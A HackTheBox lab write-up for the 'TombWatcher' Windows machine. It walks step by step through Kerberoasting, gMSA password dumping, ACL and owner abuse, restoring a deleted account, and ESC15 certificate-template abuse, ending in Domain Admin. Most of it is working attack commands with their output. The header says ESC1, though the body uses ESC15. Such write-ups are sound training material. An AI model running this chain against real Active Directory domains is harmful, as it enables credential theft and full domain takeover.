WriteupsHTB — TombWatcher
ADMediumWindows
HTB — TombWatcher
Active Directory with ADCS misconfiguration. ESC1 certificate template abuse allows requesting a certificate as Domain Admin for full compromise.
December 1, 2025HackTheBox
#AD#ADCS#ESC1#Certificate Abuse
As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.72
Host is up (0.024s latency).
Not shown: 65514 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-08 09:17:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T09:18:50+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T09:18:50+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T09:18:50+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T09:18:50+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49683/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49729/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-08T09:18:11
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 4h00m00s, deviation: 0s, median: 4h00m00s
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 25.21 ms 10.10.14.1
2 25.29 ms 10.10.11.72
shares
sh
nxc smb 10.10.11.72 -u henry -p 'H3nry_987TGV!' --shares
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\henry:H3nry_987TGV!
SMB 10.10.11.72 445 DC01 [*] Enumerated shares
SMB 10.10.11.72 445 DC01 Share Permissions Remark
SMB 10.10.11.72 445 DC01 ----- ----------- ------
SMB 10.10.11.72 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.72 445 DC01 C$ Default share
SMB 10.10.11.72 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.72 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.72 445 DC01 SYSVOL READ Logon server share
users
sh
nxc smb 10.10.11.72 -u henry -p 'H3nry_987TGV!' --users
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\henry:H3nry_987TGV!
SMB 10.10.11.72 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.72 445 DC01 Administrator 2025-06-08 02:15:34 0 Built-in account for administering the computer/domain
SMB 10.10.11.72 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.72 445 DC01 krbtgt 2024-11-16 00:02:28 0 Key Distribution Center Service Account
SMB 10.10.11.72 445 DC01 Henry 2025-05-12 15:17:03 0
SMB 10.10.11.72 445 DC01 Alfred 2025-05-12 15:17:03 0
SMB 10.10.11.72 445 DC01 sam 2025-06-08 03:52:35 0
SMB 10.10.11.72 445 DC01 john 2025-06-08 04:47:42 0
SMB 10.10.11.72 445 DC01 [*] Enumerated 7 local users: TOMBWATCHER
sh
Henry
Alfred
sam
johnsh
sudo bloodhound-python -u 'Henry' -p 'H3nry_987TGV!' -ns 10.10.11.72 -d tombwatcher.htb -c all
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.tombwatcher.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 05S
WriteSPN
sh
ntpdate tombwatcher.htb && python3 /opt/linux/targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'Henry' -p 'H3nry_987TGV!'
2025-06-08 06:48:01.718408 (-0400) +14401.208166 +/- 0.011067 tombwatcher.htb 10.10.11.72 s1 no-leap
CLOCK: time stepped by 14401.208166
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$2881d11e...$03a7dcdac22b0aca1b668b47f1d29bad3b891bd8c0a7390e849e7e6904223529a9bd5211144d92edc8be57f49ded05954937066a849984ef7b801834bf85e278ff78c17d36cef2e344bb40f206bde1c213c8670f113c75853a398ac79a1e190d34b8afa880c9f168e21e2c79923322cd0dffd2f938a1a2c8e10efd5183ea8de2614ef5b88d73195faea6f4945bc689a92a9258ba1f2b801f8b16b20ad8dd76b90d0e53aacce5b463929435e20931e0c11e4f5e04a66b8b4777cfb710042cc7ddf0ef39e763ff6b7667569ffa3e17bb4b9818d3107f61433615007c2d984133293d69991e7b23c91f2a0332899f5db958e1ee08a165575296022e74d6fc27919228ca8b6a3120c3eae098c000a67d0555928035bb9227b2869bd65146a83c4d46c5f9abe9bd81616a153b9bb412842d8db4f4c262fd907da667834b1b512c765e6874759675e31f8ca8873926e0e65284f93a697c2bf7dd143ba859bf9a7e568af10d6e7f7ecf6ef09f3819065e61e3dc3fcc79f7a7cb2e63d0822ef0501a98114ae830558d3b7aa64a3267624ffa4e2e3e1ef09e5385927688e05318788fe7665b23c3f7409d976f40b5dc225e05aa6ff15c2e82025c82b90063a1c568dd8b28c74babd29f516d94c52d33cd5462dc90703096f5217644b966429a5a0f92f40f870ea1c41ee5f4e785191889d5df0d8bbe9a8085804549ad7fb11fae2f8d8b7e94120403f15ebc3cf787e00709047a116da700563f30f98754c4200a2579028d4e8928b5c41a0450c836ea81f61492a7f43353f0a868948d0bcb4498fee0c49269bc1eee9e1083f8653d3809a502c99434d8e37e024de31eb4c60da6fc3ffddcc23c6c7d420b268ce24d9b74da2198ab2b82c898bf0b7e8a15666748717dec2ea5f1dd25872a5d3ccaef8c08794621d6a8ce082781bdc6378a8d75c0cfb3b713745cfd7fbabdf5855f36d7944e1d5158837acb060e5af4b6b443c787863cfae9ed5c002529e1de1144ebf4c779a4e4881cf367f07ee22bd8450f24b840f0b53a520411a6efb04123372c1467b4eebc0dd5a76f5e74d0ada7832e09bd8323d9913cc55f3d6fd5ebf01560f7e7e908665972f61fc803ded019f2fe2d838b4621a8fd49ea9fc1b1284053a29af4c9d4ba6cff877f4dab48dc16a07b14e32ee38ccd7dafaee75fbc81e16b2f7d6f57615fdadcac1ee63adea63dc6287450405333b803157c53122d700fe8f73e3d7ff072b2c8776b8f392a225f6c45781cb722d06a9b6da36fb67f8cbd0f300d0e4c0375dc2eafc70a48046bf5c30e96254085df1e468c8ebbc008138aebcbb8afc38c7a82720bfe85b8521ab146fa441fc873a811f697e603274ceafd28d00f85a594a440dff2202adeee90beac91b923eac2a58ec75fb31d87515fb17289565d69215720c46ad4bf2dbd64724caa52ce83841dd4e182ef47aaf5c7fe43fcf993342d13062901d730d0
[VERBOSE] SPN removed successfully for (Alfred)
sh
hashcat -m 13100 Alfred_tgs.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6-851-g6716447df) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-13th Gen Intel(R) Core(TM) i9-13900HX, 6939/13942 MB (2048 MB allocatable), 6MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$2881d11e...$03a7dcdac22b0aca1b668b47f1d29bad3b891bd8c0a7390e849e7e6904223529a9bd5211144d92edc8be57f49ded05954937066a849984ef7b801834bf85e278ff78c17d36cef2e344bb40f206bde1c213c8670f113c75853a398ac79a1e190d34b8afa880c9f168e21e2c79923322cd0dffd2f938a1a2c8e10efd5183ea8de2614ef5b88d73195faea6f4945bc689a92a9258ba1f2b801f8b16b20ad8dd76b90d0e53aacce5b463929435e20931e0c11e4f5e04a66b8b4777cfb710042cc7ddf0ef39e763ff6b7667569ffa3e17bb4b9818d3107f61433615007c2d984133293d69991e7b23c91f2a0332899f5db958e1ee08a165575296022e74d6fc27919228ca8b6a3120c3eae098c000a67d0555928035bb9227b2869bd65146a83c4d46c5f9abe9bd81616a153b9bb412842d8db4f4c262fd907da667834b1b512c765e6874759675e31f8ca8873926e0e65284f93a697c2bf7dd143ba859bf9a7e568af10d6e7f7ecf6ef09f3819065e61e3dc3fcc79f7a7cb2e63d0822ef0501a98114ae830558d3b7aa64a3267624ffa4e2e3e1ef09e5385927688e05318788fe7665b23c3f7409d976f40b5dc225e05aa6ff15c2e82025c82b90063a1c568dd8b28c74babd29f516d94c52d33cd5462dc90703096f5217644b966429a5a0f92f40f870ea1c41ee5f4e785191889d5df0d8bbe9a8085804549ad7fb11fae2f8d8b7e94120403f15ebc3cf787e00709047a116da700563f30f98754c4200a2579028d4e8928b5c41a0450c836ea81f61492a7f43353f0a868948d0bcb4498fee0c49269bc1eee9e1083f8653d3809a502c99434d8e37e024de31eb4c60da6fc3ffddcc23c6c7d420b268ce24d9b74da2198ab2b82c898bf0b7e8a15666748717dec2ea5f1dd25872a5d3ccaef8c08794621d6a8ce082781bdc6378a8d75c0cfb3b713745cfd7fbabdf5855f36d7944e1d5158837acb060e5af4b6b443c787863cfae9ed5c002529e1de1144ebf4c779a4e4881cf367f07ee22bd8450f24b840f0b53a520411a6efb04123372c1467b4eebc0dd5a76f5e74d0ada7832e09bd8323d9913cc55f3d6fd5ebf01560f7e7e908665972f61fc803ded019f2fe2d838b4621a8fd49ea9fc1b1284053a29af4c9d4ba6cff877f4dab48dc16a07b14e32ee38ccd7dafaee75fbc81e16b2f7d6f57615fdadcac1ee63adea63dc6287450405333b803157c53122d700fe8f73e3d7ff072b2c8776b8f392a225f6c45781cb722d06a9b6da36fb67f8cbd0f300d0e4c0375dc2eafc70a48046bf5c30e96254085df1e468c8ebbc008138aebcbb8afc38c7a82720bfe85b8521ab146fa441fc873a811f697e603274ceafd28d00f85a594a440dff2202adeee90beac91b923eac2a58ec75fb31d87515fb17289565d69215720c46ad4bf2dbd64724caa52ce83841dd4e182ef47aaf5c7fe43fcf993342d13062901d730d0:basketballcreds
Alfred:basketball
sh
nxc smb 10.10.11.72 -u Alfred -p 'basketball'
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\Alfred:basketball
AddSelf
txt
The user ALFRED@TOMBWATCHER.HTB has the ability to add itself, to the group INFRASTRUCTURE@TOMBWATCHER.HTB. Because of security group delegation, the members of a security group have the same privileges as that group.
By adding itself to the group, ALFRED@TOMBWATCHER.HTB will gain the same privileges that INFRASTRUCTURE@TOMBWATCHER.HTB already has.https://www.thehacker.recipes/ad/movement/dacl/addmember
sh
bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "Alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "Alfred"
[+] Alfred added to INFRASTRUCTURE
- verify users in group
sh
net rpc group members "INFRASTRUCTURE" -U "tombwatcher.htb"/"Alfred"%"basketball" -S "10.10.11.72"
TOMBWATCHER\AlfredReadGMSAPassword
ANSIBLE_DEV$@TOMBWATCHER.HTB is a Group Managed Service Account. The group INFRASTRUCTURE@TOMBWATCHER.HTB can retrieve the password for the GMSA ANSIBLE_DEV$@TOMBWATCHER.HTB.
Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is mananaged by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).
The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.
sh
python3 /opt/linux/gMSADumper.py -u 'Alfred' -p 'basketball' -d 'tombwatcher.htb'
Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::1c37d000...
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223...sh
nxc smb 10.10.11.72 -u ansible_dev$ -H '1c37d000...'
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\ansible_dev$:1c37d000...ForceChangePassword
sh
pth-net rpc password "sam" "Password123@" -U "tombwatcher.htb"/"ansible_dev$"%"ffffffff...":"1c37d000..." -S "10.10.11.72"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...WriteOwner
txt
The user SAM@TOMBWATCHER.HTB has the ability to modify the owner of the user JOHN@TOMBWATCHER.HTB.
Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.sh
owneredit.py -action write -new-owner 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Password123@'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!sh
dacledit.py -action 'write' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Password123@'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250608-170120.bak
[*] DACL modified successfully!force change password
sh
bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "sam" -p "Password123@" set password "john" "Password123@"
[+] Password changed successfully!winrm
sh
nxc smb 10.10.11.72 -u john -p 'Password123@'
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\john:Password123@sh
evil-winrm -i 10.10.11.72 -u john -p 'Password123@'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> whoami
tombwatcher\johnsh
*Evil-WinRM* PS C:\Users\john\desktop> ls
Directory: C:\Users\john\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/8/2025 11:01 AM 34 user.txt
*Evil-WinRM* PS C:\Users\john\desktop> cat user.txt
38ebdd9b...user.txt
sh
38ebdd9b...
sh
sudo bloodhound-python -u 'john' -p 'Password123@' -ns 10.10.11.72 -d tombwatcher.htb -c allsearch for deleted AD users
sh
*Evil-WinRM* PS C:\> Get-ADObject -Filter 'ObjectClass -eq "user" -and IsDeleted -eq $true' -IncludeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : tombwatcher.htb/Deleted Objects/cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
CN : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
codePage : 0
countryCode : 0
Created : 11/16/2024 12:04:05 PM
createTimeStamp : 11/16/2024 12:04:05 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData : {11/16/2024 12:04:18 PM, 11/16/2024 12:04:08 PM, 12/31/1600 7:00:00 PM}
givenName : cert_admin
instanceType : 4
isDeleted : True
LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 11/16/2024 12:04:21 PM
modifyTimeStamp : 11/16/2024 12:04:21 PM
msDS-LastKnownRDN : cert_admin
Name : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358
objectSid : S-1-5-21-1392491010-1358638721-2126982587-1110
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133762502455822446
sAMAccountName : cert_admin
sDRightsEffective : 7
sn : cert_admin
userAccountControl : 66048
uSNChanged : 13171
uSNCreated : 13161
whenChanged : 11/16/2024 12:04:21 PM
whenCreated : 11/16/2024 12:04:05 PM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : tombwatcher.htb/Deleted Objects/adminaccess
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
CN : adminaccess
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
codePage : 0
countryCode : 0
Created : 11/16/2024 12:07:04 PM
createTimeStamp : 11/16/2024 12:07:04 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=adminaccess\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData : {6/8/2025 2:41:59 PM, 6/8/2025 2:30:15 PM, 6/8/2025 2:15:08 PM, 11/16/2024 12:07:10 PM...}
givenName : cert_admin
instanceType : 4
isDeleted : True
LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff : 0
lastLogon : 0
lastLogonTimestamp : 133938811244377253
logonCount : 0
Modified : 6/8/2025 2:52:01 PM
modifyTimeStamp : 6/8/2025 2:52:01 PM
msDS-LastKnownRDN : adminaccess
Name : adminaccess
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectSid : S-1-5-21-1392491010-1358638721-2126982587-1111
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133938817421095793
sAMAccountName : cert_admin
sDRightsEffective : 7
sn : cert_admin
userAccountControl : 66048
uSNChanged : 90535
uSNCreated : 13186
whenChanged : 6/8/2025 2:52:01 PM
whenCreated : 11/16/2024 12:07:04 PMrestore cert_admin
sh
*Evil-WinRM* PS C:\> Restore-ADObject -Identity 'CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb'reset cert_admin password
sh
*Evil-WinRM* PS C:\> Set-ADAccountPassword -Identity 'cert_admin' -Reset -NewPassword (ConvertTo-SecureString 'P@ssw0rd123!' -AsPlainText -Force)sh
nxc smb 10.10.11.72 -u cert_admin -p 'P@ssw0rd123!'
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\cert_admin:P@ssw0rd123! sh
sudo bloodhound-python -u 'cert_admin' -p "P@ssw0rd123\!" -ns 10.10.11.72 -d tombwatcher.htb -c all
- delete old object in case made a mistake
sh
*Evil-WinRM* PS C:\Users\john\Documents> Remove-ADUser -Identity "cert_admin" -Confirm:$falsesh
*Evil-WinRM* PS C:\Users\john\Documents> Restore-ADObject -Identity 'CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb'sh
*Evil-WinRM* PS C:\> Set-ADAccountPassword -Identity 'cert_admin' -Reset -NewPassword (ConvertTo-SecureString 'P@ssw0rd123!' -AsPlainText -Force)certipy
sh
certipy-ad find -u 'cert_admin@tombwatcher.htb' -p 'P@ssw0rd123!' -dc-ip '10.10.11.72' -vulnerable -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : tombwatcher-CA-1
DNS Name : DC01.tombwatcher.htb
Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
Certificate Serial Number : 3428A7FC52C310B2460F8440AA8327AC
Certificate Validity Start : 2024-11-16 00:47:48+00:00
Certificate Validity End : 2123-11-16 00:57:48+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : TOMBWATCHER.HTB\Administrators
Access Rights
ManageCa : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
ManageCertificates : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Enroll : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
0
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
ESC15
sh
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.- https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc15-CVE-2024-49019-arbitrary-application-policy
sh
certipy-ad req -u 'cert_admin' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca tombwatcher-CA-1 -template WebServer -dc-ip 10.10.11.72sh
certipy-ad req -u cert_admin@tombwatcher.htb -on-behalf-of tombwatcher\\Administrator -template User -ca tombwatcher-CA-1 -pfx cert.pfx -dc-ip 10.10.11.72sh
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.72sh
sudo ntpdate 10.10.11.72 && certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.72 1 ↵
2025-06-09 13:48:34.996578 (-0400) +14402.243926 +/- 0.013320 10.10.11.72 s1 no-leap
CLOCK: time stepped by 14402.243926
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@tombwatcher.htb'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
File 'administrator.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435...:f61db423...sh
evil-winrm -i 10.10.11.72 -u administrator -H 'f61db423...'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
tombwatcher\administratorsh
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
9474ca8d...Up next
MediumJan 2026
HTB — Haze
Splunk misconfiguration leaks credentials. Active Directory enumeration reveals a privilege escalation path through ACL abuse to Domain Admin.
Read writeup
MediumJan 2026
Wiz Bug Bounty
Bug bounty masterclass covering exposed databases, SSRF, subdomain takeover, blind XSS, GitHub secret leaks, Spring Boot heapdump, and session confusion ATO.
Read writeup
MediumMar 2026
HTB — Facts
Cacti LFI via CVE-2024-46987 reads configuration files and credentials. Sudo abuse on a custom binary escalates to root.
Read writeup